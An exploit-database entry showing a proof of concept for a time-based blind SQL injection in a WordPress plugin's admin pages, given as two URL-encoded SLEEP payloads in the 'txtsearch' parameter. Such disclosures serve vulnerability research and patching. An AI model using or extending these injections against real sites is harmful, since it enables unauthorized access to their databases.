Share
## https://sploitus.com/exploit?id=WPEX-ID:8C82D317-F9F9-4E25-A7F1-43EDB77E8ABA
As an admin, visit either of the following URL's. Note that it takes several seconds for the page to load, which illustrates the SQL Injection vulnerability.

/wp-admin/admin.php?page=general_settings_menu&display=users&txtsearch=%27+AND+%28SELECT+1+FROM+%28SELECT%28SLEEP%281%29%29%29x%29+AND+%27x%27%3D%27

/wp-admin/admin.php?page=user_action_log&txtsearch=%27+AND+%28SELECT+1+FROM+%28SELECT%28SLEEP%281%29%29%29x%29+AND+%27x%27%3D%27